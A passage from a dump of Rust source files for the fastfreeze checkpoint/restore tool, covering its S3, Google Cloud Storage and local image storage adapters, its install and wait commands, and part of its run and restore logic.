// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use url::Url; use crate::util::UrlExt; // Google Cloud Storage adapter lazy_static! { static ref GS_CMD: String = std::env::var("GS_CMD") .unwrap_or_else(|_| "gcsthin".to_string()); } pub struct Store { url: Url, } impl Store { pub fn new(url: Url) -> Self { Self { url } } } impl super::Store for Store { fn prepare(&self, _write: bool) -> Result<()> { Ok(()) } fn file(&self, filename: &str) -> Box<dyn super::File> { Box::new(File { url: self.url.raw_join(filename) }) } } pub struct File { url: Url, } impl super::File for File { fn upload_shell_cmd(&self) -> String { // TODO Allow lifecycle management options to be configured // https://cloud.google.com/storage/docs/managing-lifecycles format!("{} cp - \"{}\"", *GS_CMD, self.url) } fn download_shell_cmd(&self) -> String { format!("{} cp \"{}\" -", *GS_CMD, self.url) } fn has_not_found_error(&self, stderr: &str) -> bool { stderr.contains("Not Found") || stderr.contains("No such object") } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/local.rs
src/store/local.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::path::PathBuf; use crate::util::create_dir_all; pub struct Store { path: PathBuf, } impl Store { pub fn new(path: &str) -> Self { Self { path: PathBuf::from(path) } } } impl super::Store for Store { fn prepare(&self, write: bool) -> Result<()> { if write { create_dir_all(&self.path)?; } Ok(()) } fn file(&self, filename: &str) -> Box<dyn super::File> { let file_path = if filename == "/dev/null" { PathBuf::from("/dev/null") } else { self.path.join(filename) }; Box::new(File { path: file_path }) } } pub struct File { path: PathBuf, } impl super::File for File { fn upload_shell_cmd(&self) -> String { // We can unwrap() because the path is valid UTF8, as path comes from a String format!("pv -q > \"{}\"", self.path.to_str().unwrap()) } fn download_shell_cmd(&self) -> String { format!("pv -q \"{}\"", self.path.to_str().unwrap()) } fn has_not_found_error(&self, stderr: &str) -> bool { stderr.contains("No such file or directory") } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/s3.rs
src/store/s3.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use url::Url; use crate::{ consts::*, util::UrlExt, }; // AWS S3 adapter lazy_static! { static ref S3_CMD: String = std::env::var("S3_CMD") .unwrap_or_else(|_| "aws s3".to_string()); } pub struct Store { url: Url, } impl Store { pub fn new(url: Url) -> Self { Self { url } } } impl super::Store for Store { fn prepare(&self, _write: bool) -> Result<()> { Ok(()) } fn file(&self, filename: &str) -> Box<dyn super::File> { Box::new(File { url: self.url.raw_join(filename) }) } } pub struct File { url: Url, } impl super::File for File { fn upload_shell_cmd(&self) -> String { // TODO allow users to add an expiration date on images via an env var // XXX aws s3 cp eats 500Mb+ of memory. That's terrible when using multiple shards. // We'll most likely need to make our own upload tool. // This large expected size ensures that there are not too many multiparts pieces let expected_size = 10*GB; format!("{} cp --expected-size {} - \"{}\"", *S3_CMD, expected_size, self.url) } fn download_shell_cmd(&self) -> String { format!("{} cp \"{}\" -", *S3_CMD, self.url) } fn has_not_found_error(&self, stderr: &str) -> bool { stderr.contains("Not Found") } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/mod.rs
src/store/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. mod local; mod s3; mod gs; use anyhow::{Result, Context}; use std::{ borrow::Cow, fmt, io::Write, }; use url::{Url, ParseError}; use crate::process::{Stdio, Command}; // `Store` and `File` describe the API needed to store and retrieve images pub trait Store { /// prepare() is called before accessing the storage. It is called: /// * with write=true, during the FastFreeze run command /// * with write=false, during the FastFreeze extract command /// It is not called during the checkpoint command to speed things up. fn prepare(&self, write: bool) -> Result<()>; /// Returns a File object that represents a file of name `filename`. /// Example of file name are "manifest.json" and "XXXX-4.ffs". fn file(&self, filename: &str) -> Box<dyn File>; } pub trait File { /// Returns a shell command to upload file fn upload_shell_cmd(&self) -> String; /// Returns a shell command to download file fn download_shell_cmd(&self) -> String; // Returns whether stderr contains a "not found error" when the download // shell command failed. fn has_not_found_error(&self, stderr: &str) -> bool; } // write()/try_read() are helpers that use the `File` download/upload shell // commands to download and upload content. pub trait FileExt: File { /// Write content to the file, truncating it if necessary. 
fn write(&self, log_prefix: &'static str, data: &[u8]) -> Result<()> { let mut p = Command::new_shell(&self.upload_shell_cmd()) .stdin(Stdio::piped()) .enable_stderr_logging(log_prefix) .spawn()?; // We are simultaneously writing to stdin and reading stderr. // While we are writing to stdin, the upload shell command might be // blocking on us to drain stderr, leading to a deadlock. // We use a thread to avoid complications. It's a bit overkill, but works. // With a scoped thread, we wouldn't need the data copy, but it's okay // we just use it to copy a small json file (the manifest). let data = Vec::from(data); let mut stdin = p.take_stdin().expect("stdin isn't connected"); let stdin_write_thread = std::thread::spawn(move || stdin.write_all(&data)); p.wait_for_success()?; stdin_write_thread.join().expect("thread panic") .with_context(|| format!("{}> write to stdin failed", log_prefix)) } /// Reads a file. Returns None if it doesn't exist. fn try_read<S>(&self, log_prefix: S) -> Result<Option<Vec<u8>>> where S: Into<Cow<'static, str>> { let log_prefix = log_prefix.into(); let p = Command::new_shell(&self.download_shell_cmd()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) .spawn()?; let output = p.wait_with_output()?; if output.status.success() { Ok(Some(output.stdout)) } else { let stderr = String::from_utf8_lossy(&output.stderr); if self.has_not_found_error(&stderr) { trace!("{}> File does not exist. stderr is: {}", log_prefix, stderr); Ok(None) } else { Err(output.ensure_success_with_stderr_log(log_prefix).unwrap_err()) } } } } impl FileExt for dyn File {} pub struct ImageUrl(Url); impl ImageUrl { /// If url does not start with "scheme:", it is assumed to be a file path. 
pub fn parse(url_str: &str) -> Result<Self> { match Url::parse(url_str) { Err(ParseError::RelativeUrlWithoutBase) => { ensure!(url_str.starts_with('/'), "Please use an absolute path for the image path"); Self::parse(&format!("file:{}", url_str)) }, Err(e) => bail!(e), Ok(url) => { { let path = url.path(); ensure!(url.path_segments().is_some(), "Image URL path is empty"); ensure!(path.chars().last() != Some('/'), "Image URL path should not end with a trailing /"); } Ok(Self(match url.scheme() { "file" => { // The url parser prefix the relative paths with /, and we // have no way to know once parsed. Which is why we do error // detection here, and not in local::Store. ensure!(url_str.starts_with("file:/"), "Please use an absolute path for the image path"); url }, "s3" | "gs" => url, _ => bail!("Unknown image scheme {}", url), })) } } } pub fn image_name(&self) -> &str { // The unwraps are okay, we already validated that we have some in parse_image_url(). self.0.path_segments().unwrap().last().unwrap() } pub fn store(&self) -> Box<dyn Store> { match self.0.scheme() { "file" => Box::new(local::Store::new(self.0.path())), "s3" => Box::new(s3::Store::new(self.0.clone())), "gs" => Box::new(gs::Store::new(self.0.clone())), // panic!() is okay, validation is already done in parse(). 
_ => panic!("Unknown image scheme"), } } } impl fmt::Display for ImageUrl { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "{}", self.0) } } #[cfg(test)] mod test { use super::*; #[test] fn test_from_url() { assert!(ImageUrl::parse("file:/tmp/img").is_ok()); assert!(ImageUrl::parse("file:tmp/img").is_err()); } fn test_store_read_write(store: &Box<dyn Store>) -> Result<()> { store.prepare(true)?; store.file("f1.txt").write("test", "hello".as_bytes())?; assert_eq!(store.file("f1.txt").try_read("read test")?, Some("hello".as_bytes().to_vec())); assert_eq!(store.file("none.txt").try_read("read test")?, None); Ok(()) } #[test] fn test_read_write() -> Result<()> { test_store_read_write(&ImageUrl::parse("file:/tmp/ff-test-files")?.store())?; Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/install.rs
src/cli/install.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use structopt::StructOpt; use serde::Serialize; use std::io::ErrorKind; use crate::{ consts::*, util::{create_dir_all, find_lib, atomic_symlink, copy_file, set_tmp_like_permissions}, container, }; /// Install FastFreeze, required when namespaces are not available (e.g., Docker). #[derive(StructOpt, PartialEq, Debug, Serialize)] pub struct Install { /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Proceed with installation, even if containers can be created, and /// installation would not be necessary. #[structopt(long)] pub force: bool, } pub fn is_ff_installed() -> Result<bool> { Ok(match LD_SYSTEM_PATH.read_link() { Ok(path) => path.eq(&*LD_VIRTCPUID_PATH), // EINVAL means the file is not a symlink. Err(e) if e.kind() == ErrorKind::InvalidInput => false, Err(e) => Err(e).with_context(|| format!("Failed to read link {}", LD_SYSTEM_PATH.display()))?, }) } pub fn prepare_ff_dir() -> Result<()> { // NO_PRESERVE_FF_DIR includes FF_DIR in its subpath. One stone two birds. create_dir_all(&*NO_PRESERVE_FF_DIR)?; // We give /tmp-like permissions to allow other users to write to the directory // But this can fail. We can get an EPERM error if FF_DIR is volume-bind mounted for // example. If chmod fails, that's fine, but fastfreeze can only be ran as the user who // installed fastfreeze. 
if let Err(e) = set_tmp_like_permissions(&*FF_DIR) .and(set_tmp_like_permissions(&*NO_PRESERVE_FF_DIR)) { warn!("{}\nThat's okay. \ The only restriction is to not change user (uid) when using fastfreeze", e); } // copy /lib/ld-linux.so to /var/tmp/fastfreeze/run/ld-linux.so copy_file(&*LD_SYSTEM_PATH, &*LD_SYSTEM_ORIG_PATH)?; // copy our virtualization libraries to /var/tmp/fastfreeze/run/ for path in &[&*LD_VIRTCPUID_PATH, &*LIBVIRTCPUID_PATH, &*LIBVIRTTIME_PATH] { copy_file(find_lib(path.file_name().unwrap())?, path)?; } Ok(()) } impl super::CLI for Install { fn run(self) -> Result<()> { let Self { verbose: _, force } = self; match (container::ns_capabilities()?.can_mount_ns(), force) { (false, _) => {} (true, false) => bail!( "Installation does not seem necessary because FastFreeze can create mount namespaces. \ Use `--force` if you want to proceed. Use it when building Docker images that are meant to run in restricted environment."), (true, true) => warn!("Installation does not seem necessary, but proceeding anyways"), } prepare_ff_dir()?; // symlink /var/tmp/fastfreeze/run/ld-virtcpuid.so to /lib/ld-linux.so atomic_symlink(&*LD_VIRTCPUID_PATH, &*LD_SYSTEM_PATH) .with_context(|| format!("Failed to override the system ELF loader {}", LD_SYSTEM_PATH.display()))?; Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/wait.rs
src/cli/wait.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::time::{Instant, Duration}; use structopt::StructOpt; use serde::Serialize; use crate::{ container, lock::checkpoint_restore_lock, }; /// Wait for checkpoint or restore to finish #[derive(StructOpt, PartialEq, Debug, Serialize)] pub struct Wait { /// Fail after some specified number of seconds. Decimals are allowed #[structopt(short, long)] timeout: Option<f64>, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Target the specified application. See the run command help about /// --app-name for more details. #[structopt()] app_name: Option<String>, } impl super::CLI for Wait { fn run(self) -> Result<()> { let Self { timeout, app_name, verbose: _ } = self; let timeout = timeout.map(|t| Instant::now() + Duration::from_secs_f64(t)); container::maybe_nsenter_app(app_name.as_ref())?; let _lock_guard = checkpoint_restore_lock(timeout, false)?; Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/mod.rs
src/cli/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. pub mod run; mod checkpoint; mod extract; mod wait; pub mod install; mod main; use crate::consts::*; pub trait CLI { fn run(self) -> anyhow::Result<()>; } #[derive(Debug)] pub struct ExitCode(pub u8); impl std::fmt::Display for ExitCode { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "Exiting with exit_code={}", self.0) } } impl ExitCode { pub fn from_error(e: &anyhow::Error) -> u8 { e.downcast_ref::<Self>() .map(|exit_code| exit_code.0) .unwrap_or(EXIT_CODE_FAILURE) } } pub use main::Opts;
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/run.rs
src/cli/run.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ io::{BufReader, BufWriter}, collections::HashSet, ffi::OsString, fs, path::{Path, PathBuf}, time::{SystemTime, Duration} }; use nix::{ sys::signal, unistd::Pid, }; use structopt::StructOpt; use serde::{Serialize, Deserialize}; use crate::{ consts::*, store::{ImageUrl, Store}, virt, cli::{ExitCode, install}, image::{ManifestFetchResult, ImageManifest, shard, check_passphrase_file_exists}, process::{Command, CommandPidExt, ProcessExt, ProcessGroup, Stdio, spawn_set_ns_last_pid_server, set_ns_last_pid, monitor_child, MIN_PID}, metrics::{with_metrics, with_metrics_raw, metrics_error_json}, signal::kill_process_tree, util::JsonMerge, filesystem, image_streamer::{Stats, ImageStreamer}, lock::with_checkpoint_restore_lock, container, criu, }; use virt::time::Nanos; /// Run application. /// If a checkpoint image exists, the application is restored. Otherwise, the /// application is run from scratch. #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt(after_help("\ ENVS: FF_APP_PATH The PATH to use for the application FF_APP_LD_LIBRARY_PATH The LD_LIBRARY_PATH to use for the application FF_APP_VIRT_CPUID_MASK The CPUID mask to use. See libvirtcpuid documentation for more details FF_APP_INJECT_<VAR_NAME> Additional environment variables to inject to the application and its children. 
For example, FF_APP_INJECT_LD_PRELOAD=/opt/lib/libx.so FF_METRICS_RECORDER When specified, FastFreeze invokes the specified program to report metrics. The metrics are formatted in JSON and passed as first argument FF_FAKE_ROOT Setting to 1 instructs FastFreeze to use uid=0 when creating user namespaces CRIU_OPTS Additional arguments to pass to CRIU, whitespace separated S3_CMD Command to access AWS S3. Defaults to 'aws s3' GS_CMD Command to access Google Storage. Defaults to 'gcsthin' TAR_CMD Command to untar the file system. Defaults to 'tar' EXIT CODES: 171 A failure happened during restore, or while fetching the image manifest. Retrying with --no-restore will avoid that failure 170 A failure happened before the application was ready 128+sig_nr The application caught a fatal signal corresponding to `sig_nr` exit_code The application exited with `exit_code`" ))] pub struct Run { /// Image URL. S3, GCS and local filesystem are supported: {n} /// * s3://bucket_name/image_path {n} /// * gs://bucket_name/image_path {n} /// * file:image_path /// It defaults to file:$HOME/.fastfreeze/<app_name> // {n} means new line in the CLI's --help command #[structopt(short, long, name="url")] image_url: Option<String>, /// Application command, used when running the app from scratch. /// When absent, FastFreeze runs in restore-only mode. #[structopt()] app_args: Vec<OsString>, /// Shell command to run once the application is running. // Note: Type should be OsString, but structopt doesn't like it #[structopt(long="on-app-ready", name="cmd")] on_app_ready_cmd: Option<String>, /// Always run the app from scratch. Useful to ignore a faulty image. #[structopt(long)] no_restore: bool, /// Allow restoring of images that don't match the version we expect. #[structopt(long)] allow_bad_image_version: bool, /// Provide a file containing the passphrase to be used for encrypting /// or decrypting the image. 
For security concerns, using a ramdisk /// like /dev/shm to store the passphrase file is preferable. #[structopt(long)] passphrase_file: Option<PathBuf>, /// Dir/file to include in the checkpoint image. /// May be specified multiple times. Multiple paths can also be specified colon separated. // require_delimiter is set to avoid clap's non-standard way of accepting lists. #[structopt(long="preserve-path", name="path", require_delimiter=true, value_delimiter=":")] preserved_paths: Vec<PathBuf>, /// Remap the TCP listen socket ports during restore. /// Format is old_port:new_port. /// Multiple tcp port remaps may be passed as a comma separated list. // We use String because we just pass the argument directly to criu-image-streamer. #[structopt(long, require_delimiter = true)] tcp_listen_remap: Vec<String>, /// Leave application stopped after restore, useful for debugging. /// Has no effect when running the app from scratch. #[structopt(long)] leave_stopped: bool, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Specify the application name. This is used to distinguish applications /// when running multiple ones. The default is the file name of the image-url. /// Note: application specific files are located in /tmp/fastfreeze/<app_name>. #[structopt(short="n", long)] app_name: Option<String>, /// Avoid the use of user, mount, or pid namespaces for running the application. /// This requires to run the install command prior. #[structopt(long)] no_container: bool, } /// `AppConfig` is created during the run command, and updated during checkpoint. /// These settings are saved under `APP_CONFIG_PATH`. /// It's useful for the checkpoint command to know the image_url and preserved_paths. /// During restore, it is useful to read the app_clock. 
#[derive(Serialize, Deserialize)] pub struct AppConfig { pub image_url: String, pub preserved_paths: HashSet<PathBuf>, pub passphrase_file: Option<PathBuf>, pub app_clock: Nanos, // Used to compute the duration between a restore and a checkpoint, for metrics only. pub created_at: SystemTime, // When we pass external pipes to the application as stdin/stdout/stderr, // we need to remember the pipe inodes that we passed, so that when we restore, // we can replace the original external pipes by the new ones. pub inherited_resources: criu::InheritableResources, } impl AppConfig { pub fn save(&self) -> Result<()> { let file = fs::File::create(&*APP_CONFIG_PATH) .with_context(|| format!("Failed to create {}", APP_CONFIG_PATH.display()))?; let file = BufWriter::new(file); serde_json::to_writer_pretty(file, &self)?; Ok(()) } pub fn restore() -> Result<AppConfig> { let file = fs::File::open(&*APP_CONFIG_PATH) .with_context(|| format!("Failed to open {}. \ It is created during the run command", APP_CONFIG_PATH.display()))?; let file = BufReader::new(file); Ok(serde_json::from_reader(file)?) } pub fn exists() -> bool { APP_CONFIG_PATH.exists() } pub fn remove() -> Result<()> { fs::remove_file(&*APP_CONFIG_PATH) .with_context(|| format!("Failed to remove {}", APP_CONFIG_PATH.display())) } } pub fn is_app_running() -> bool { AppConfig::exists() && Path::new("/proc").join(APP_ROOT_PID.to_string()).exists() } // It returns Stats, that's the transfer speeds and all given by criu-image-streamer, // and the duration since the checkpoint happened. This is helpful for emitting metrics. 
fn restore( image_url: ImageUrl, mut preserved_paths: HashSet<PathBuf>, tcp_listen_remaps: Vec<String>, passphrase_file: Option<PathBuf>, shard_download_cmds: Vec<String>, leave_stopped: bool, ) -> Result<(Stats, Duration)> { info!("Restoring application{}", if leave_stopped { " (leave stopped)" } else { "" }); let mut pgrp = ProcessGroup::new()?; let mut img_streamer = ImageStreamer::spawn_serve(shard_download_cmds.len(), tcp_listen_remaps)?; img_streamer.process.join(&mut pgrp); // Spawn the download processes connected to the image streamer's input for (i, (download_cmd, shard_pipe)) in shard_download_cmds.into_iter().zip(img_streamer.shard_pipes).enumerate() { Command::new_shell(&download_cmd) .stdout(Stdio::from(shard_pipe)) .enable_stderr_logging(format!("download shard {}", i)) .spawn()? .join(&mut pgrp); } debug!("Restoring filesystem"); let untar_ps = filesystem::untar_cmd(img_streamer.tar_fs_pipe.unwrap()) .enable_stderr_logging("untar") .spawn()? .join(&mut pgrp); // We want to wait for tar to complete successfully. But if tar errors, // we want to report the errors of tar and all other processes involved. // The easiest way to use the process group. pgrp.get_mut(untar_ps).wait()?; // wait for tar to finish pgrp.try_wait_for_success()?; // if tar errored, this is where we exit. debug!("Filesystem restored"); // Because the tar command can be overridden by the user via TAR_CMD, // it may consume many pids. Later, when we invoke the "criu restore" tool, // we must ensure that its PID is lower than APP_ROOT_PID, otherwise it could // clash with itself. // We set ns_last_pid to APP_ROOT_PID-100 to balance performance and safety: // too low, and we might have to do a PID round trip over pid_max, too high and // we risk set_ns_last_pid and criu to go over APP_ROOT_PID if they are invoked via // bash scripts that do interesting things. // Note that later, we check that criu's pid is indeed lower than APP_ROOT_PID. 
set_ns_last_pid(APP_ROOT_PID-100)?; // The file system is back, including the application configuration containing user-defined // preserved-paths, and application time offset. // We load the app config, add the new preserved_paths, and save it. // It will be useful for the subsequent checkpoints. // Also, we keep the passphrase_file setting if there's one to ensure that // a previously encrypted image remains encrypted. This is normally unecessary, because // if the image was in fact encrypted, we would be using a passphrase_file already. let (duration_since_checkpoint, previously_inherited_resources) = { let old_config = AppConfig::restore()?; preserved_paths.extend(old_config.preserved_paths); let passphrase_file = passphrase_file.or(old_config.passphrase_file); let previously_inherited_resources = old_config.inherited_resources; let current_inherited_resources = criu::InheritableResources::current()?; ensure!(previously_inherited_resources.compatible_with(&current_inherited_resources), "Cannot match the original application file descriptors patterns. \ Try again by connecting file descriptors such that they are grouped in a similar manner. \n\ Original file descriptors: {:#?},\n\ Current file descriptors: {:#?}", previously_inherited_resources.0, current_inherited_resources.0); let config = AppConfig { image_url: image_url.to_string(), preserved_paths, passphrase_file, created_at: SystemTime::now(), app_clock: old_config.app_clock, inherited_resources: current_inherited_resources, }; config.save()?; // old_config.created contains the date when checkpoint happened. // It is a wall clock time coming from another machine. // The duration between restore and checkpoint can therefore be inaccurate, and negative. // we'll clamp these negative values to 0. 
let restore_started_at = SystemTime::now() - START_TIME.elapsed(); let duration_since_checkpoint = restore_started_at.duration_since(old_config.created_at) .unwrap_or_else(|_| Duration::new(0,0)); debug!("Duration between restore and checkpoint: {:.1}s", duration_since_checkpoint.as_secs_f64()); // Adjust the libtimevirt offsets // Note that we do not add the duration_since_checkpoint to the clock. // The man page of clock_gettime(2) says that CLOCK_MONOTONIC "does not // count time that the system is suspended." // The man page says that CLOCK_BOOTTIME is supposed to be the one that // includes the duration when the system was suspended. // For now, we don't worry much about the semantics of CLOCK_BOOTTIME. // Rare are the applications that use it. debug!("Application clock: {:.1}s", Duration::from_nanos(old_config.app_clock as u64).as_secs_f64()); virt::time::ConfigPath::default().adjust_timespecs(old_config.app_clock)?; (duration_since_checkpoint, previously_inherited_resources) }; // We start the ns_last_pid daemon here. Note that we join_as_daemon() instead of join(), // this is so we don't wait for it in wait_for_success(). debug!("Starting set_ns_last_pid server"); spawn_set_ns_last_pid_server()? .join_as_daemon(&mut pgrp); debug!("Continuing reading image in memory..."); // `check_pgrp_err()` is useful to report the process group error, // which is a more interesting error to report than the error of wait_for_stats(), // (which would typically be a pipe read error) let mut check_pgrp_err = |err| { if let Err(e) = pgrp.try_wait_for_success() { e } else { err } }; let stats = img_streamer.progress.wait_for_stats() .map_err(&mut check_pgrp_err)?; stats.show(); // Wait for the CRIU socket to be ready. img_streamer.progress.wait_for_socket_init() .map_err(&mut check_pgrp_err)?; // Restore application processes. // We become the parent of the application as CRIU is configured to use CLONE_PARENT. 
debug!("Restoring processes"); criu::criu_restore_cmd(leave_stopped, &previously_inherited_resources) .enable_stderr_logging("criu") .spawn() .and_then(|ps| { ensure!(ps.pid() < APP_ROOT_PID, "CRIU's pid is too high: {}", ps.pid()); Ok(ps) })? .join(&mut pgrp); // Wait for all our all our monitored processes to finish. // If there's an issue, kill the app if it's still laying around. // We might want to check that we are the parent of the process with pid APP_ROOT_PID, // otherwise, we might be killing an innocent process. But that would be racy anyways. if let Err(e) = pgrp.wait_for_success() { let _ = kill_process_tree(Pid::from_raw(APP_ROOT_PID), signal::SIGKILL); return Err(e); } info!("Application is ready, restore took {:.1}s", START_TIME.elapsed().as_secs_f64()); Ok((stats, duration_since_checkpoint)) } fn run_from_scratch( image_url: ImageUrl, preserved_paths: HashSet<PathBuf>, passphrase_file: Option<PathBuf>, app_cmd: Vec<OsString>, ) -> Result<()> { let inherited_resources = criu::InheritableResources::current()?; let config = AppConfig { image_url: image_url.to_string(), preserved_paths, passphrase_file, app_clock: 0, created_at: SystemTime::now(), inherited_resources, }; config.save()?; virt::time::ConfigPath::default().write_intial()?; virt::enable_system_wide_virtualization()?; ensure!(!app_cmd.is_empty(), "Error: application command must be specified"); let mut cmd = Command::new(app_cmd); if let Some(path) = std::env::var_os("FF_APP_PATH") { cmd.env_remove("FF_APP_PATH") .env("PATH", path); } if let Some(library_path) = std::env::var_os("FF_APP_LD_LIBRARY_PATH") { cmd.env_remove("FF_APP_LD_LIBRARY_PATH") .env("LD_LIBRARY_PATH", library_path); } cmd.env("FASTFREEZE", "1"); // We don't set the application in a process group because we want to be // compatible with both of these usages: // * "cat | fastfreeze run cat": the first cat must be in the process group // controlling the terminal to receive input // * "fastfreeze run cat": the cat here must 
be in the process group // controlling the terminal // We don't want to create a new process group as this would remove any // hopes in making both scenarios work well. // If we reparent orphans of the application, they will be invisible from CRIU // when it tries to checkpoint the application. That's bad. Instead, we make sure // the application root process reparents the orphans. cmd.set_child_subreaper(); cmd.spawn_with_pid(APP_ROOT_PID)?; info!("Application is ready, started from scratch"); Ok(()) } pub enum RunMode { Restore { img_manifest: ImageManifest }, FromScratch, } pub fn determine_run_mode(store: &dyn Store, allow_bad_image_version: bool) -> Result<RunMode> { let fetch_result = with_metrics("fetch_manifest", || ImageManifest::fetch_from_store(store, allow_bad_image_version), |fetch_result| match fetch_result { ManifestFetchResult::Some(_) => json!({"manifest": "good", "run_mode": "restore"}), ManifestFetchResult::VersionMismatch {..} => json!({"manifest": "version_mismatch", "run_mode": "run_from_scratch"}), ManifestFetchResult::NotFound => json!({"manifest": "not_found", "run_mode": "run_from_scratch"}), } )?; Ok(match fetch_result { ManifestFetchResult::Some(img_manifest) => { debug!("Image manifest found: {}", img_manifest); RunMode::Restore { img_manifest } } ManifestFetchResult::VersionMismatch { fetched, desired } => { info!("Image manifest found, but has version {} while the expected version is {}. \ You may try again with --allow-bad-image-version. \ Running application from scratch", fetched, desired); RunMode::FromScratch } ManifestFetchResult::NotFound => { debug!("Image manifest not found, running application from scratch"); RunMode::FromScratch } }) } fn ensure_non_conflicting_pid() -> Result<()> { // We don't want to use a PID that could be potentially used by the // application when being restored. 
